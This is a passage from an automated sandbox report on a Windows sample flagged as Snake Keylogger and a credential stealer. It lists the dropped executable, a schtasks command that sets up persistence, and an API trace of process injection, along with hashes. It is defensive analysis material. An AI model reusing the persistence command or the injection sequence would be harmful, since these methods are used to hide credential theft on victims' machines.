Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000A.00000002.3693243826.0000000003180000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000A.00000002.3693243826.00000000030ED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.3693243826.00000000031E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000A.00000002.3693243826.00000000031E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000A.00000002.3693243826.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	09:08:18
Start date:	24/07/2024
Path:	C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe
Imagebase:	0x690000
File size:	561'664 bytes
MD5 hash:	978148253C4B65B751FCD3CB4713F614
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.1307021274.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.1307021274.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.1307021274.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000B.00000002.1307021274.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 45%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	09:08:19
Start date:	24/07/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff7fb730000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	09:08:21
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp547C.tmp"
Imagebase:	0xbe0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	09:08:21
Start date:	24/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	09:08:21
Start date:	24/07/2024
Path:	C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe"
Imagebase:	0x490000
File size:	561'664 bytes
MD5 hash:	978148253C4B65B751FCD3CB4713F614
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000017.00000002.3693041192.0000000002960000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000017.00000002.3693041192.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000017.00000002.3693041192.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000017.00000002.3693041192.00000000029EE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000017.00000002.3693041192.0000000002791000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	10.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	3.7%
Total number of Nodes:	162
Total number of Limit Nodes:	11

Executed Functions

Function 08D19260 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1270197925.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d10000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb8569d53c0f2dcda254848ebe7480abb1eb288be75bf67faba791fdefbc609d
Instruction ID: af5c0c476b5350718a3995f10093d4220aff7286d21b3541a0d254f27510f49f
Opcode Fuzzy Hash: bb8569d53c0f2dcda254848ebe7480abb1eb288be75bf67faba791fdefbc609d
Instruction Fuzzy Hash: 9F913670D04228EFEB24CF66D8647E9BBB6BF89301F5082EAD44DA7240DB745A85CF40

Function 08D195B6 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1270197925.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d10000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 298105cf18095d7d1dd67dd2046d83f42aedb286e53326d1ac3edb608ed15614
Instruction ID: ac12e560cc39c0a99dde0bc9ba9637c4cd958471fdcceb5f6e490c338be083eb
Opcode Fuzzy Hash: 298105cf18095d7d1dd67dd2046d83f42aedb286e53326d1ac3edb608ed15614
Instruction Fuzzy Hash: A4D05E6584D208FACF50DEB5F4212F5BDF8EB0B281F807745C84DA2701D228C9108E20

Function 02F7D031 Relevance: 6.1, APIs: 4, Instructions: 130
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 02F7D0BE
GetCurrentThread.KERNEL32 ref: 02F7D0FB
GetCurrentProcess.KERNEL32 ref: 02F7D138
GetCurrentThreadId.KERNEL32 ref: 02F7D191

Memory Dump Source

Source File: 00000000.00000002.1264854905.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f70000_rPO0977-6745.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 766244ab174b207fe7004c385b5b005c14fb56b27fdd86b069d400ad4d5e2257
Instruction ID: 0baccc2d39a8903fa0122b87890c5f898fd6b28c26338a9383a9710c1a6c9c5e
Opcode Fuzzy Hash: 766244ab174b207fe7004c385b5b005c14fb56b27fdd86b069d400ad4d5e2257
Instruction Fuzzy Hash: 105145B09003498FEB18DFA9D548B9EBBF1BF8C318F24845AE009A73A0D7755944CB66

Function 02F7D040 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 02F7D0BE
GetCurrentThread.KERNEL32 ref: 02F7D0FB
GetCurrentProcess.KERNEL32 ref: 02F7D138
GetCurrentThreadId.KERNEL32 ref: 02F7D191

Memory Dump Source

Source File: 00000000.00000002.1264854905.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f70000_rPO0977-6745.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 581a161d995582b215c1d20ed94c62f23d8c3d3328e76090c0822f13073c6c07
Instruction ID: 3a373705a9069d0199c5ad3746061a3f272230b6cb72dfc9efd3817fb70cdc43
Opcode Fuzzy Hash: 581a161d995582b215c1d20ed94c62f23d8c3d3328e76090c0822f13073c6c07
Instruction Fuzzy Hash: BF5156B09003498FEB14DFAAD548B9EBBF1BF8C318F24845AE409A7360D7745944CB66

Function 08D14B1D Relevance: 1.7, APIs: 1, Instructions: 249
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 08D14D5E

Memory Dump Source

Source File: 00000000.00000002.1270197925.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d10000_rPO0977-6745.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 2fce53d21501df6a7218353a3813a860ac2e9b9965211dcca4f7095b5e672183
Instruction ID: 732a1d213ff69656648aff773a0644fa3716f6887288246fff63e8767d379d8e
Opcode Fuzzy Hash: 2fce53d21501df6a7218353a3813a860ac2e9b9965211dcca4f7095b5e672183
Instruction Fuzzy Hash: 0FA14771D002299FEF24DF68D840BADBBF3BF48355F1482A9E808A7240DB749985CF95

Function 08D14B28 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 08D14D5E

Memory Dump Source

Source File: 00000000.00000002.1270197925.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d10000_rPO0977-6745.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: edccda6f33146b3e4b04e6348843eabcc7580a4efebd6b6fce2c0fb5b37bee2a
Instruction ID: 3223ac3a3ee61be7e3d28b0345295b9e7d6d8b2a6a569d976b7cdabff78610bd
Opcode Fuzzy Hash: edccda6f33146b3e4b04e6348843eabcc7580a4efebd6b6fce2c0fb5b37bee2a
Instruction Fuzzy Hash: 95914771D002199FEF24DF68D840BADBBF3BF48355F1482A9E808A7280DB749985CF95

Function 02F7ADA8 Relevance: 1.7, APIs: 1, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02F7AFFE

Memory Dump Source

Source File: 00000000.00000002.1264854905.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f70000_rPO0977-6745.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 7eb982c3d3a47b650fe37e2e37f742a735d13171ab5b780e15e7559a45b6a3d8
Instruction ID: f48c91be770643a0c5c28ded975fb66f42b06eaa7977441b5288bae09e1df623
Opcode Fuzzy Hash: 7eb982c3d3a47b650fe37e2e37f742a735d13171ab5b780e15e7559a45b6a3d8
Instruction Fuzzy Hash: 41713470A00B058FD724DF2AD54479ABBF2FF88744F008A2ED18AD7A50DB75E949CB91

Function 02F744C4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02F759C9

Memory Dump Source

Source File: 00000000.00000002.1264854905.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f70000_rPO0977-6745.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f077b79fb820d168d6c38ebb1fa8d91628265f14ab2d4cda61421fc1198d899e
Instruction ID: 4d4f41f9addc47079fcc4aade585794890e36a2c211738fed538f9522ec02709
Opcode Fuzzy Hash: f077b79fb820d168d6c38ebb1fa8d91628265f14ab2d4cda61421fc1198d899e
Instruction Fuzzy Hash: 3841BFB1C00719CFEB24DFA9C884B9DBBF5BF48304F64806AD508AB251DB756946CFA0

Function 02F7590C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02F759C9

Memory Dump Source

Source File: 00000000.00000002.1264854905.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f70000_rPO0977-6745.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: efebcb462f3299378318163d47842045d341fe87584295a14a675c0959d530ad
Instruction ID: aac5d556da688900d0e9e87325f32f682d699b1107282cdd50a457b43af4246e
Opcode Fuzzy Hash: efebcb462f3299378318163d47842045d341fe87584295a14a675c0959d530ad
Instruction Fuzzy Hash: 1D41BFB1C00719CFEB24DFA9C884BDDBBB6BF49304F24806AD808AB251DB755946CF90

Function 08D14898 Relevance: 1.6, APIs: 1, Instructions: 70
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08D14930

Memory Dump Source

Source File: 00000000.00000002.1270197925.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d10000_rPO0977-6745.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 2bfe8f344a6ec3bc217047faab568a431116e11411379c4a11b046a06deb5462
Instruction ID: 757e41f051bb8a11718d7a2e506c6c9202139f1e2b119068a499fbcdfb2279c9
Opcode Fuzzy Hash: 2bfe8f344a6ec3bc217047faab568a431116e11411379c4a11b046a06deb5462
Instruction Fuzzy Hash: 462104B2D003599FDF10CFA9C881BEEBBF6BF48350F14842AE959A7250C7789950CB64

Function 08D148A0 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08D14930

Memory Dump Source

Source File: 00000000.00000002.1270197925.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d10000_rPO0977-6745.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: a7ceafa3485d109c3e25e35a3e7b424ab5eb87deedd09dda3f4558f031963d53
Instruction ID: 6f6eb37e6b2c395bc82b94efd0c2a8d8f78d0177008d196932a90a0f1829961e
Opcode Fuzzy Hash: a7ceafa3485d109c3e25e35a3e7b424ab5eb87deedd09dda3f4558f031963d53
Instruction Fuzzy Hash: 642104719003599FDF10CFAAC880BDEBBF5BF48310F14842AE958A7240C7789950CBA5

Function 08D14700 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08D14786

Memory Dump Source

Source File: 00000000.00000002.1270197925.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d10000_rPO0977-6745.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 7ab9ba43b28ffa42d4ab8aa9ec5b656547d4045d743e25deba39ac8fe78939c4
Instruction ID: 901fab1f2f6d6c62179501708a42228bd28c162f607fb223d23dbe254b571145
Opcode Fuzzy Hash: 7ab9ba43b28ffa42d4ab8aa9ec5b656547d4045d743e25deba39ac8fe78939c4
Instruction Fuzzy Hash: E5214571D003099FDB10DFAAC4817AEBBF5EF48324F14842AD419A7640DB789945CBA9

Function 08D14989 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08D14A10

Memory Dump Source

Source File: 00000000.00000002.1270197925.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d10000_rPO0977-6745.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: b3b269161789da8288368cfd0f2d15d70f852705009cbb80df039cb5a16ac13b
Instruction ID: 5806f5894d1e4d80d852affac4267b84731ce17d55436868d7ab3fe88204a090
Opcode Fuzzy Hash: b3b269161789da8288368cfd0f2d15d70f852705009cbb80df039cb5a16ac13b
Instruction Fuzzy Hash: 702126B1C002499FDB10CFAAC880BDEBBF5FF48310F54842AE518A7240D7799500DB69

Function 08D14990 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08D14A10

Memory Dump Source

Source File: 00000000.00000002.1270197925.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d10000_rPO0977-6745.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: b60915fff9c24301875657e5650d304fee18026449339fbd00ec9ad2b1438730
Instruction ID: 905354f220d38adc3cea64983eabccd193c881ae1d55dcb19211dd95a7d380fa
Opcode Fuzzy Hash: b60915fff9c24301875657e5650d304fee18026449339fbd00ec9ad2b1438730
Instruction Fuzzy Hash: A42105B1C003599FDB10DFAAC880BDEBBF5FF48310F14842AE518A7240D7799500DBA9

Function 08D14708 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08D14786

Memory Dump Source

Source File: 00000000.00000002.1270197925.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d10000_rPO0977-6745.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: a462c4a1b628e82e5f72e5c081e1fbb01791f96f9cf7e448cff48931732bab6e
Instruction ID: bd7690550d798bb9b4ca7ca555c3d57338c02fb69c48a541ee0e6b72c96f5d6e
Opcode Fuzzy Hash: a462c4a1b628e82e5f72e5c081e1fbb01791f96f9cf7e448cff48931732bab6e
Instruction Fuzzy Hash: EF213471D003099FDB14DFAAC484BAEBBF5AF48324F14842ED419A7640CB78A944CBA9

Function 02F7D690 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02F7D717

Memory Dump Source

Source File: 00000000.00000002.1264854905.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f70000_rPO0977-6745.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 37ab1ffd96d592b0eef9843037efa74931e0bbbde3c8d5868520433c323c4918
Instruction ID: 051aeb0bca833b666251cae5000f63b259028796c8cbdf602dbf7d1c6057bd7a
Opcode Fuzzy Hash: 37ab1ffd96d592b0eef9843037efa74931e0bbbde3c8d5868520433c323c4918
Instruction Fuzzy Hash: 1921E2B5D002489FDB10CFAAD984ADEFBF8FB48314F14841AE918A3350D379A950CFA5

Function 02F7D689 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02F7D717

Memory Dump Source

Source File: 00000000.00000002.1264854905.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f70000_rPO0977-6745.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 8d84aae8d4038bb38dd4dd822a6e5429bc353885cd7de538dba0cc641e931711
Instruction ID: a0b0d2ba77cd6d859cc321791a0f9c61e600bf5b3648ba4c1e5a9a016a57d931
Opcode Fuzzy Hash: 8d84aae8d4038bb38dd4dd822a6e5429bc353885cd7de538dba0cc641e931711
Instruction Fuzzy Hash: DF21E3B5D00258DFDB10CFA9D984ADEBBF5EB48314F14841AE918A3350D378A951CF65

Function 08D147D8 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08D1484E

Memory Dump Source

Source File: 00000000.00000002.1270197925.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d10000_rPO0977-6745.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 6f1bf0e881f637389aa5c7e4e445dcf5f2ab5fb7614e07b4cf445d4aa25b130d
Instruction ID: 9633f2f5aeba2cf87b6b644d765f2011186f74737c4b741e63e64e163cbd3ada
Opcode Fuzzy Hash: 6f1bf0e881f637389aa5c7e4e445dcf5f2ab5fb7614e07b4cf445d4aa25b130d
Instruction Fuzzy Hash: C2212472C002489FDF20CFAAD844BEEBBF2AF48324F14841AE459A7650D7759901CFA5

Function 02F7A130 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02F7B079,00000800,00000000,00000000), ref: 02F7B28A

Memory Dump Source

Source File: 00000000.00000002.1264854905.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f70000_rPO0977-6745.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 959b98fff188d8f58a901d510d16505af47b6205c5fc32cd290363dda003ca54
Instruction ID: 0800a4922d7d20f7c5289a1ebb064cc45d27d0417cb3700b3c0b8ecc19ebe776
Opcode Fuzzy Hash: 959b98fff188d8f58a901d510d16505af47b6205c5fc32cd290363dda003ca54
Instruction Fuzzy Hash: 001112B6D013088FDB21CFAAC844BDEFBF4EB49314F14842AE919A7210C375A545CFA9

Function 02F7B219 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02F7B079,00000800,00000000,00000000), ref: 02F7B28A

Memory Dump Source

Source File: 00000000.00000002.1264854905.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f70000_rPO0977-6745.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 28211366d153e53e35e19c81ef9920f45c6cb9f342547d188803bd076fc47e0d
Instruction ID: a1dd79d36a34e2d6a5d76535e91d9cde8c18bd543686977d90091571ee0212e5
Opcode Fuzzy Hash: 28211366d153e53e35e19c81ef9920f45c6cb9f342547d188803bd076fc47e0d
Instruction Fuzzy Hash: 3F1114B6C003088FDB24CF9AC844BDEFBF4EB48314F14842AD919A7210C375A545CFA5

Function 08D14218 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 08D14282

Memory Dump Source

Source File: 00000000.00000002.1270197925.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d10000_rPO0977-6745.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 01ce6a28225b38be22c8d32933c493fe49c50358ac1743b29b8de86ac1a2a997
Instruction ID: 8facd0a1da6e007b117824785ecc963c99080e0e90b10918ced60b102580b2f8
Opcode Fuzzy Hash: 01ce6a28225b38be22c8d32933c493fe49c50358ac1743b29b8de86ac1a2a997
Instruction Fuzzy Hash: 32113471D003588FDB24DFAAC48479EFBF5EF48324F24882AD419A7640D779A944CBA9

Function 08D147E0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08D1484E

Memory Dump Source

Source File: 00000000.00000002.1270197925.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d10000_rPO0977-6745.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3c51475b57bf228c643f1979f012b4594aedf06816916ce55fe6f1d0ad38306e
Instruction ID: 8c77129d186a8f08675989d7e0d7b392b5e9d86df40f49cd4c968d2349218bc9
Opcode Fuzzy Hash: 3c51475b57bf228c643f1979f012b4594aedf06816916ce55fe6f1d0ad38306e
Instruction Fuzzy Hash: 2C115672C003489FDF20DFAAC844BDEBBF6EF48320F14841AE519A7250C7759500CBA9

Function 08D14220 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 08D14282

Memory Dump Source

Source File: 00000000.00000002.1270197925.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d10000_rPO0977-6745.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 299580df628ff6562a517161d540550c557f7c09f86d924680c5630f740d3002
Instruction ID: 5f03f3f3e0b6b72436fc794223837453036fcfc562f24e850de8af376312519a
Opcode Fuzzy Hash: 299580df628ff6562a517161d540550c557f7c09f86d924680c5630f740d3002
Instruction Fuzzy Hash: 421125B1D003488FDB24DFAAC44479EFBF5AF88324F24841ED419A7640CB79A940CBA9

Function 08D1A3C0 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 08D1A425

Memory Dump Source

Source File: 00000000.00000002.1270197925.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d10000_rPO0977-6745.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 2da18b0ee1d1c86021a52c22773e6c1c03c293444f2125a5e138240f49ba7b78
Instruction ID: cc7eba2c25e012c38c49c59362d3f6d1e004fef288155e6b49f0f036981351c0
Opcode Fuzzy Hash: 2da18b0ee1d1c86021a52c22773e6c1c03c293444f2125a5e138240f49ba7b78
Instruction Fuzzy Hash: 7F11DFB58003599FDB20CF9AD889BDEFBF8EB48320F10845AE518A7250D375A944CFA5

Function 02F7AF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02F7AFFE

Memory Dump Source

Source File: 00000000.00000002.1264854905.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f70000_rPO0977-6745.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: ffda5d41e15d024a0981779f6ec9fff4b1c52783f5be7ccba5c082d438a23489
Instruction ID: 0b1aaa29616aef751892c0830c6a54da2c4c8a0ef2bca66977f4024f313165bb
Opcode Fuzzy Hash: ffda5d41e15d024a0981779f6ec9fff4b1c52783f5be7ccba5c082d438a23489
